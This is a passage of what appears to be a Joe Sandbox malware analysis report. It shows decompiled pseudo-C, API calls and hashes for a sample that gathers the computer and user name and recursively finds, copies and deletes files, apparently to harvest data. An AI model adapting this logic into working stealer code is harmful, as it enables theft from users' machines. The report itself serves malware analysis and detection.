Instruction Fuzzy Hash: 00E06D72A10198ABCB11EAA8DC40ADEB7FDDB48200F0045A2A905E3180E5709F414B90

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFB9 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EFB9(CHAR* _a4) {
				signed char _t5;
				void* _t9;

				_t5 = GetFileAttributesA(_a4); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					_t9 = 0;
				} else {
					_t9 = 1;
				}
				E00401859(_a4);
				return _t9;
			}

0x0040efc0
0x0040efc9
0x0040efd4
0x0040efcf
0x0040efd1
0x0040efd1
0x0040efd9
0x0040efe2

APIs

GetFileAttributesA.KERNEL32(?,?,?,004092CC,?,?,?), ref: 0040EFC0

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b8355a9d5e265ea8ff6db233d47dd8377e3dce27b7c46b0e98c1ba5dce8b26a2
Instruction ID: 962a61a332adf63f51469a883093f43a178eccc3755a0703187902e5d52b556d
Opcode Fuzzy Hash: b8355a9d5e265ea8ff6db233d47dd8377e3dce27b7c46b0e98c1ba5dce8b26a2
Instruction Fuzzy Hash: 37D05E31508128B7CB2026AAEC0449ABE0ADA017B67504A33F969E61E1C274DC6283C5

Uniqueness

Uniqueness Score: -1.00%

Function 004010B1 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004010B1() {
				void* _t1;
				int _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t5;
				intOrPtr _t6;

				_t1 = E0040E8DF(_t4);
				_t5 =  *0x615470; // 0x6b1128
				_t2 = E0040EE4D(_t1, _t4, _t5);
				if(_t2 == 0) {
					_t3 = E0040E8AD(_t4);
					_t6 =  *0x615530; // 0x6b1108
					_t2 = E0040EE4D(_t3, _t4, _t6);
					if(_t2 == 0) {
						ExitProcess(_t2);
					}
				}
				return _t2;
			}

0x004010b1
0x004010b6
0x004010bc
0x004010c3
0x004010c5
0x004010ca
0x004010d0
0x004010d7
0x004010da
0x004010da
0x004010d7
0x004010e0

APIs

Part of subcall function 0040E8DF: GetProcessHeap.KERNEL32(00000000,00000104,76636410,?,?,004010B6,0040E259), ref: 0040E8EB
Part of subcall function 0040E8DF: RtlAllocateHeap.NTDLL(00000000), ref: 0040E8F2
Part of subcall function 0040E8DF: GetComputerNameA.KERNEL32(00000000,?), ref: 0040E906

Part of subcall function 0040E8AD: GetProcessHeap.KERNEL32(00000000,00000104,76636410,?,?,004010CA,0040E259), ref: 0040E8B9
Part of subcall function 0040E8AD: RtlAllocateHeap.NTDLL(00000000), ref: 0040E8C0
Part of subcall function 0040E8AD: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E8D4

ExitProcess.KERNEL32 ref: 004010DA

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: ef81f53c0f4158080b7cb2cbd5dd45c99caa7a3660aa5226d1a8f698d24ae0eb
Instruction ID: 2edcc7e7b11d06e3ebeb04c1c78ec86e580ab7b1d433273d787e0c262409762f
Opcode Fuzzy Hash: ef81f53c0f4158080b7cb2cbd5dd45c99caa7a3660aa5226d1a8f698d24ae0eb
Instruction Fuzzy Hash: C3D0A9A0710108CACB40B3B3DD4224A229B6E8038C308D837B442E21B5EA3CC8104688

Uniqueness

Uniqueness Score: -1.00%

Function 004052A5 Relevance: 1.3, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004052A5(void* __ebx, void* __edx, void* __edi, void* __eflags, char _a4, void* _a8) {
				char _v8;
				void* _v12;
				char _v16;
				void* _t16;
				char _t17;

				_v8 = malloc(0x20);
				_v16 = _a4;
				_t44 = _a8;
				_v12 = _a8;
				_t16 = E00405083(__ebx, _a8,  &_v16, _t14); // executed
				if(_t16 == 0) {
					_t17 = _v8;
					if(_t17 == 0) {
						goto L2;
					} else {
						_push(__ebx);
						_t41 =  *((intOrPtr*)(_t17 + 8));
						_t53 =  *((intOrPtr*)(_t17 + 0x14));
						 *0x6155c0 = E0040521E( *((intOrPtr*)(_t17 + 0x14)),  *((intOrPtr*)(_t17 + 8)), _t44,  *0x615378);
						 *0x61557c = E0040521E( *((intOrPtr*)(_t17 + 0x14)),  *((intOrPtr*)(_t17 + 8)), _t44,  *0x6150a0);
						 *0x615598 = E0040521E(_t53,  *((intOrPtr*)(_t17 + 8)), _t44,  *0x61530c);
						 *0x6155b4 = E0040521E(_t53, _t41, _t44,  *0x6152f8);
						 *0x61559c = E0040521E(_t53, _t41, _t44,  *0x61531c);
						 *0x6155c4 = E0040521E(_t53, _t41, _t44,  *0x615488);
						 *0x6155a4 = E0040521E(_t53, _t41, _t44,  *0x6153d8);
						 *0x6155ac = E0040521E(_t53, _t41, _t44,  *0x6154d0);
						return 1;
					}
				} else {
					_v12 =  &_v8;
					memset(_v12, 0, 4 << 0);
					L2:
					return 0;
				}
			}

0x004052b7
0x004052ba
0x004052bd
0x004052c4
0x004052c7
0x004052d1
0x004052eb
0x004052f0
0x00000000
0x004052f2
0x004052f2
0x004052f3
0x004052f7
0x0040530d
0x0040531f
0x00405331
0x00405343
0x00405355
0x00405367
0x00405379
0x00405388
0x00405393
0x00405393
0x004052d3
0x004052d7
0x004052e4
0x004052e7
0x004052ea
0x004052ea

APIs

malloc.MSVCRT ref: 004052AD

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 6234084fac78a141f340b6873f0bf183b2bb952345f43bffe46706658bf1e7ad
Instruction ID: 3670e2e45e53f37bf77b9f734083cef0c121b5b3118ab4bbcd75bed411992383
Opcode Fuzzy Hash: 6234084fac78a141f340b6873f0bf183b2bb952345f43bffe46706658bf1e7ad
Instruction Fuzzy Hash: 28212F75A10A04EFC701EFA9ED0158EBFEBEB88704B05906BE905E3362E73485009F59

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040BBCE Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 134
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040BBCE(void* __ecx, intOrPtr _a4, char _a8) {
				char _v12;
				CHAR* _v16;
				char _v28;
				char _v296;
				struct _WIN32_FIND_DATAA _v616;
				char _v880;
				char _v1144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t64;
				void* _t83;
				void* _t97;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t125;
				void* _t126;
				void* _t128;

				_t97 = __ecx;
				_v12 = RtlAllocateHeap(GetProcessHeap(), 0, 0x98967f);
				wsprintfA( &_v880, "%s\\*", _a4);
				_t120 = _t119 + 0xc;
				_t116 = FindFirstFileA( &_v880,  &_v616);
				if(_t116 == 0xffffffff) {
					L8:
					return E004016CC( &_a8);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(0x411bf0);
					_push( &(_v616.cFileName));
					if( *0x615784() != 0) {
						_t83 =  *0x615784( &(_v616.cFileName), 0x411bf4);
						_t131 = _t83;
						if(_t83 != 0) {
							wsprintfA( &_v1144, "%s\\%s", _a4,  &(_v616.cFileName));
							CopyFileA( &_v1144,  &(_v616.cFileName), 1);
							_t128 = _t120 + 0x10 - 0x50;
							E004016EB( &_a8, _t128);
							_push(_v12);
							_push( &(_v616.cFileName));
							E0040B981(_t97, _t131);
							_t120 = _t128 + 0x58;
							DeleteFileA( &(_v616.cFileName));
						}
					}
				} while (FindNextFileA(_t116,  &_v616) != 0);
				FindClose(_t116);
				_v16 =  &_v296;
				memset(_v16, 0, 0x104 << 0);
				_t121 = _t120 + 0xc;
				 *0x61575c( &_v296,  *0x615454);
				 *0x61575c( &_v296,  *0x615180);
				_t64 =  *0x61567c(_v12);
				_t133 = _t64;
				if(_t64 > 0) {
					_push( *0x61567c(_v12));
					_push(_v12);
					_t125 = _t121 - 0xc;
					E004100ED(_t125, _t133,  &_v296);
					_t126 = _t125 - 0x50;
					E004016EB( &_a8, _t126);
					_push( &_v28);
					E00403F95(0, _t133);
					_t121 = _t126 + 0x68;
					E00401859(_v28);
				}
				_v16 =  &_v296;
				memset(_v16, 0, 0x104 << 0);
				_v16 =  &_v880;
				memset(_v16, 0, 0x104 << 0);
				_v16 =  &_v12;
				memset(_v16, 0, 4 << 0);
				goto L8;
			}

0x0040bbce
0x0040bbf1
0x0040bc00
0x0040bc06
0x0040bc1d
0x0040bc22
0x0040bd95
0x0040bda1
0x00000000
0x00000000
0x00000000
0x0040bc28
0x0040bc28
0x0040bc28
0x0040bc33
0x0040bc3c
0x0040bc4a
0x0040bc50
0x0040bc52
0x0040bc6a
0x0040bc83
0x0040bc89
0x0040bc91
0x0040bc96
0x0040bc9f
0x0040bca0
0x0040bca5
0x0040bcaf
0x0040bcaf
0x0040bc52
0x0040bcc3
0x0040bccc
0x0040bcd8
0x0040bce5
0x0040bce5
0x0040bcf4
0x0040bd07
0x0040bd10
0x0040bd16
0x0040bd18
0x0040bd23
0x0040bd24
0x0040bd2d
0x0040bd33
0x0040bd38
0x0040bd40
0x0040bd48
0x0040bd49
0x0040bd51
0x0040bd54
0x0040bd54
0x0040bd5f
0x0040bd6c
0x0040bd74
0x0040bd81
0x0040bd86
0x0040bd93
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0040BBE1
RtlAllocateHeap.NTDLL(00000000), ref: 0040BBE8
wsprintfA.USER32 ref: 0040BC00
FindFirstFileA.KERNEL32(?,?), ref: 0040BC17
StrCmpCA.SHLWAPI(?,00411BF0), ref: 0040BC34
StrCmpCA.SHLWAPI(?,00411BF4), ref: 0040BC4A
wsprintfA.USER32 ref: 0040BC6A
CopyFileA.KERNEL32(?,?,00000001), ref: 0040BC83

Part of subcall function 0040B981: memset.MSVCRT ref: 0040B9A3
Part of subcall function 0040B981: memset.MSVCRT ref: 0040B9B1
Part of subcall function 0040B981: lstrcat.KERNEL32(?,00000000), ref: 0040B9D0
Part of subcall function 0040B981: lstrcat.KERNEL32(?), ref: 0040B9EB
Part of subcall function 0040B981: lstrcat.KERNEL32(?,?), ref: 0040B9FF
Part of subcall function 0040B981: lstrcat.KERNEL32(?), ref: 0040BA12
Part of subcall function 0040B981: StrStrA.SHLWAPI(00000000), ref: 0040BAAC

DeleteFileA.KERNEL32(?), ref: 0040BCAF
FindNextFileA.KERNEL32(00000000,?), ref: 0040BCBD
FindClose.KERNEL32(00000000), ref: 0040BCCC
lstrcat.KERNEL32(?), ref: 0040BCF4
lstrcat.KERNEL32(?), ref: 0040BD07
lstrlen.KERNEL32(0040BECF), ref: 0040BD10
lstrlen.KERNEL32(0040BECF), ref: 0040BD1D

Strings

%s\%s, xrefs: 0040BC64
%s\*, xrefs: 0040BBFA

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateCloseCopyDeleteFirstNextProcess
String ID: %s\%s$%s\*
API String ID: 1244429688-2848263008
Opcode ID: 0becdf517183a7f20244aabe08388657763c46abcc8a9be24d39d80a5cb3edce
Instruction ID: fc7673d0abc4db9cb3d86fa41ea3098c7933ff21caf1a0591e61eda7e9d83a78
Opcode Fuzzy Hash: 0becdf517183a7f20244aabe08388657763c46abcc8a9be24d39d80a5cb3edce
Instruction Fuzzy Hash: C2512E71900219EBCB10EBA4DC49ADDBBBDEB48305F0485A6F609E2260EB3997558F94

Uniqueness

Uniqueness Score: -1.00%

Function 0040827F Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 286
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040827F(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, char _a40, intOrPtr _a52, char _a56) {
				char _v20;
				CHAR* _v32;
				void* _v36;
				CHAR* _v48;
				char _v52;
				char _v56;
				CHAR* _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v224;
				char _v236;
				char _v248;
				char _v260;
				char _v272;
				char _v284;
				char _v296;
				char _v308;
				char _v320;
				char _v332;
				struct _WIN32_FIND_DATAA _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t134;
				void* _t152;
				intOrPtr _t207;
				intOrPtr _t216;
				void* _t235;
				void* _t245;
				void* _t260;
				void* _t281;
				void* _t282;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;

				_t281 = __ecx;
				_t282 = 0x411be1;
				E004100ED( &_v68, __eflags, 0x411be1);
				E0041018C(E00410208( &_a4, _t281,  &_v32, __eflags, "\*.*"), _t281,  &_v68);
				E00401859(_v32);
				_t134 = FindFirstFileA(_v68,  &_v656);
				_v36 = _t134;
				if(_t134 != 0xffffffff) {
					do {
						_push(0x411bf0);
						_push( &(_v656.cFileName));
						if( *0x615784() != 0) {
							_t152 =  *0x615784( &(_v656.cFileName), 0x411bf4);
							_t347 = _t152;
							if(_t152 != 0) {
								E004100ED( &_v32, _t347, _t282);
								E004100ED( &_v20, _t347, _t282);
								E0041018C(E004101C6( &_v32, _t281,  &_a4,  &_v260, _t347), _t281,  &_v32);
								E00401859(_v260);
								E0041018C(E00410208( &_v32, _t281,  &_v284, _t347, 0x411be4), _t281,  &_v32);
								E00401859(_v284);
								E0041018C(E00410208( &_v32, _t281,  &_v116, _t347,  &(_v656.cFileName)), _t281,  &_v32);
								E00401859(_v116);
								E0041018C(E00410208( &_v20, _t281,  &_v236, _t347,  *0x615434), _t281,  &_v20);
								E00401859(_v236);
								E0041018C(E00410208( &_v20, _t281,  &_v140, _t347, 0x411be4), _t281,  &_v20);
								E00401859(_v140);
								E0041018C(E004101C6( &_v20, _t281,  &_a16,  &_v332, _t347), _t281,  &_v20);
								E00401859(_v332);
								E0041018C(E00410208( &_v20, _t281,  &_v164, _t347, 0x411be4), _t281,  &_v20);
								E00401859(_v164);
								E0041018C(E004101C6( &_v20, _t281,  &_a28,  &_v80, _t347), _t281,  &_v20);
								E00401859(_v80);
								E0041018C(E00410208( &_v20, _t281,  &_v188, _t347, 0x411be4), _t281,  &_v20);
								E00401859(_v188);
								E0041018C(E004101C6( &_v20, _t281,  &_a40,  &_v308, _t347), _t281,  &_v20);
								E00401859(_v308);
								_t207 = _a52;
								if(_t207 == 0) {
									E0041018C(E00410208( &_v20, _t281,  &_v152, __eflags, 0x411be4), _t281,  &_v20);
									E00401859(_v152);
									E0041018C(E00410208( &_v20, _t281,  &_v176, __eflags,  *0x61541c), _t281,  &_v20);
									_t216 = _v176;
									goto L9;
								} else {
									_t260 = _t207 - 1;
									if(_t260 == 0) {
										E0041018C(E00410208( &_v20, _t281,  &_v104, __eflags, 0x411be4), _t281,  &_v20);
										E00401859(_v104);
										E0041018C(E00410208( &_v20, _t281,  &_v128, __eflags,  *0x615324), _t281,  &_v20);
										_t216 = _v128;
										goto L9;
									} else {
										_t350 = _t260 == 1;
										if(_t260 == 1) {
											E0041018C(E00410208( &_v20, _t281,  &_v212, _t350, 0x411be4), _t281,  &_v20);
											E00401859(_v212);
											E0041018C(E00410208( &_v20, _t281,  &_v92, _t350,  *0x615100), _t281,  &_v20);
											_t216 = _v92;
											L9:
											E00401859(_t216);
										}
									}
								}
								E0041018C(E00410208( &_v20, _t281,  &_v200, _t350, 0x411be4), _t281,  &_v20);
								E00401859(_v200);
								E0041018C(E00410208( &_v20, _t281,  &_v224, _t350,  &(_v656.cFileName)), _t281,  &_v20);
								E00401859(_v224);
								E004100ED( &_v48, _t350, 0x411be1);
								E0041018C(E00410208( &_v48, _t281,  &_v248, _t350,  *0x6153e4), _t281,  &_v48);
								E00401859(_v248);
								_t235 = E0040EEA9(0x411be4,  &_v296, _t350, 8);
								_pop(_t281);
								E0041018C(E004101C6( &_v48, _t281, _t235,  &_v272, _t350), _t281,  &_v48);
								E00401859(_v272);
								E00401859(_v296);
								CopyFileA(_v32, _v48, 1);
								_t341 = _t340 - 0xc;
								E004100ED(_t341, _t350, _v48);
								_t245 = E00405394( &_v52,  &_v56);
								_t340 = _t341 + 0xc;
								_t351 = _t245;
								if(_t245 != 0) {
									_push(_v56);
									_push(_v52);
									_t342 = _t340 - 0xc;
									E0041011F( &_v20, _t281, _t342, _t351);
									_t343 = _t342 - 0x50;
									E004016EB( &_a56, _t343);
									_push( &_v320);
									E00403F95(_t281, _t351);
									_t340 = _t343 + 0x68;
									E00401859(_v320);
								}
								DeleteFileA(_v48);
								E00401859(_v48);
								E00401859(_v20);
								E00401859(_v32);
								_t282 = 0x411be1;
							}
						}
					} while (FindNextFileA(_v36,  &_v656) != 0);
					FindClose(_v36);
				}
				E00401859(_v68);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				E00401859(_a40);
				return E004016CC( &_a56);
			}

0x0040827f
0x0040828b
0x00408294
0x004082ac
0x004082b4
0x004082c3
0x004082c9
0x004082cf
0x004082d5
0x004082d5
0x004082e0
0x004082e9
0x004082fb
0x00408301
0x00408303
0x0040830d
0x00408316
0x0040832f
0x0040833a
0x00408356
0x00408361
0x0040837b
0x00408383
0x0040839f
0x004083aa
0x004083c1
0x004083cc
0x004083e5
0x004083f0
0x00408407
0x00408412
0x00408428
0x00408430
0x00408447
0x00408452
0x0040846b
0x00408476
0x0040847e
0x00408481
0x0040851d
0x00408528
0x00408544
0x00408549
0x00000000
0x00408487
0x00408487
0x00408488
0x004084e0
0x004084e8
0x00408501
0x00408506
0x00000000
0x0040848a
0x0040848a
0x0040848b
0x004084a3
0x004084ae
0x004084c7
0x004084cc
0x0040854f
0x0040854f
0x0040854f
0x0040848b
0x00408488
0x00408566
0x00408571
0x0040858e
0x00408599
0x004085a6
0x004085c2
0x004085cd
0x004085da
0x004085e1
0x004085f3
0x004085fe
0x00408609
0x00408616
0x0040861c
0x00408624
0x0040862f
0x00408634
0x00408637
0x00408639
0x0040863b
0x00408641
0x00408644
0x00408649
0x0040864e
0x00408656
0x00408661
0x00408662
0x0040866d
0x00408670
0x00408670
0x00408678
0x00408681
0x00408689
0x00408691
0x00408696
0x00408696
0x00408303
0x004086ab
0x004086b6
0x004086b6
0x004086bf
0x004086c7
0x004086cf
0x004086d7
0x004086df
0x004086f0

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

FindFirstFileA.KERNEL32(?,?,\*.*,00411BE1,?,?,?), ref: 004082C3
StrCmpCA.SHLWAPI(?,00411BF0,?,?,?), ref: 004082E1
StrCmpCA.SHLWAPI(?,00411BF4,?,?,?), ref: 004082FB

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

CopyFileA.KERNEL32(?,?,00000001), ref: 00408616
DeleteFileA.KERNEL32(?), ref: 00408678
FindNextFileA.KERNEL32(?,?,?,?,?), ref: 004086A5
FindClose.KERNEL32(?,?,?,?), ref: 004086B6

Strings

\*.*, xrefs: 00408299

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 6cd75f2c89d6e831f50d08b4cec3bc467eaea8fe75885cf99481ffd8074d9af6
Instruction ID: 6e9f3052fe70087eb6c7e2f428ebd8fef7db02aa56f4739ab40030e135f2bd9b
Opcode Fuzzy Hash: 6cd75f2c89d6e831f50d08b4cec3bc467eaea8fe75885cf99481ffd8074d9af6
Instruction Fuzzy Hash: 0AC1A932D1012E9BCF10FBA5DC45ADDB378BF00308F41847BE515B71A1DA796E8A8B98

Uniqueness

Uniqueness Score: -1.00%

Function 00407FA8 Relevance: 13.7, APIs: 9, Instructions: 202
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00407FA8(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, char _a40) {
				char _v20;
				void* _v24;
				CHAR* _v36;
				char _v48;
				char _v60;
				char _v72;
				struct _WIN32_FIND_DATAA _v392;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t70;
				void* _t86;
				void* _t101;
				void* _t150;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t198;
				void* _t199;

				_t150 = __ecx;
				E004100ED( &_v36, __eflags, 0x411be1);
				E0041018C(E00410208(E004101C6( &_v36, _t150,  &_a16,  &_v48, __eflags), _t150,  &_v20, __eflags, "\\*"), _t150,  &_v36);
				E00401859(_v20);
				E00401859(_v48);
				_t70 = FindFirstFileA(_v36,  &_v392);
				_v24 = _t70;
				if(_t70 != 0xffffffff) {
					do {
						_push(0x411bf0);
						_push( &(_v392.cFileName));
						if( *0x615784() != 0) {
							_t86 =  *0x615784( &(_v392.cFileName), 0x411bf4);
							_t203 = _t86;
							if(_t86 != 0) {
								E004100ED( &_v20, _t203, 0x411be1);
								E0041018C(E00410208(E00410208(E004101C6( &_v20, _t150,  &_a16,  &_v60, _t203), _t150,  &_v72, _t203, 0x411be4), _t150,  &_v48, _t203,  &(_v392.cFileName)), _t150,  &_v20);
								E00401859(_v48);
								E00401859(_v72);
								E00401859(_v60);
								_t101 =  *0x615784( &(_v392.cFileName),  *0x615370);
								_t204 = _t101;
								if(_t101 != 0) {
									__eflags =  *0x615784( &(_v392.cFileName),  *0x615010);
									if(__eflags != 0) {
										__eflags =  *0x615784( &(_v392.cFileName),  *0x615550);
										if(__eflags != 0) {
											__eflags =  *0x615784( &(_v392.cFileName),  *0x615090);
											if(__eflags == 0) {
												_t187 = _t182 - 0x50;
												_t149 =  &_a40;
												E004016EB( &_a40, _t187);
												_t188 = _t187 - 0xc;
												E0041011F( &_a28, _t150, _t188, __eflags);
												_t189 = _t188 - 0xc;
												E0041011F( &_a4, _t150, _t189, __eflags);
												_t190 = _t189 - 0xc;
												E0041011F( &_v20, _t150, _t190, __eflags);
												E00407D3D(_t150, __eflags);
												goto L11;
											}
										} else {
											_t191 = _t182 - 0xc;
											E0041011F( &_a16, _t150, _t191, __eflags);
											_t192 = _t191 - 0xc;
											E0041011F( &_a28, _t150, _t192, __eflags);
											_t193 = _t192 - 0xc;
											E0041011F( &_a4, _t150, _t193, __eflags);
											E00407249(_t149,  &_a16, _t193);
											_t182 = _t193 + 0x24;
										}
									} else {
										_t194 = _t182 - 0x50;
										_t149 =  &_a40;
										E004016EB( &_a40, _t194);
										_t195 = _t194 - 0xc;
										E0041011F( &_a28, _t150, _t195, __eflags);
										_t196 = _t195 - 0xc;
										E0041011F( &_a4, _t150, _t196, __eflags);
										_t190 = _t196 - 0xc;
										E0041011F( &_v20, _t150, _t190, __eflags);
										E00407A6E(_t150, __eflags);
										goto L11;
									}
								} else {
									_t197 = _t182 - 0x50;
									_t149 =  &_a40;
									E004016EB( &_a40, _t197);
									_t198 = _t197 - 0xc;
									E0041011F( &_a28, _t150, _t198, _t204);
									_t199 = _t198 - 0xc;
									E0041011F( &_a4, _t150, _t199, _t204);
									_t190 = _t199 - 0xc;
									E0041011F( &_v20, _t150, _t190, _t204);
									E0040764C(_t150, _t204);
									L11:
									_t182 = _t190 + 0x74;
								}
								_t205 = _v392.dwFileAttributes & 0x00000010;
								if((_v392.dwFileAttributes & 0x00000010) != 0) {
									_t183 = _t182 - 0x50;
									_t149 =  &_a40;
									E004016EB( &_a40, _t183);
									_t184 = _t183 - 0xc;
									E0041011F( &_a28, _t150, _t184, _t205);
									_t185 = _t184 - 0xc;
									E0041011F( &_v20, _t150, _t185, _t205);
									_t186 = _t185 - 0xc;
									E004100ED(_t186, _t205,  &(_v392.cFileName));
									E00407FA8(_t150, _t205);
									_t182 = _t186 + 0x74;
								}
								E00401859(_v20);
							}
						}
					} while (FindNextFileA(_v24,  &_v392) != 0);
					FindClose(_v24);
				}
				E00401859(_v36);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				return E004016CC( &_a40);
			}

0x00407fa8
0x00407fbc
0x00407fdf
0x00407fe7
0x00407fef
0x00407ffe
0x00408004
0x0040800a
0x00408010
0x00408010
0x0040801b
0x00408024
0x00408036
0x0040803c
0x0040803e
0x0040804c
0x0040807e
0x00408086
0x0040808e
0x00408096
0x004080a8
0x004080ae
0x004080b0
0x00408103
0x00408105
0x00408158
0x0040815a
0x004081a0
0x004081a2
0x004081a4
0x004081a7
0x004081ac
0x004081b1
0x004081b9
0x004081be
0x004081c6
0x004081cb
0x004081d3
0x004081d8
0x00000000
0x004081d8
0x0040815c
0x0040815c
0x00408164
0x00408169
0x00408171
0x00408176
0x0040817e
0x00408183
0x00408188
0x00408188
0x00408107
0x00408107
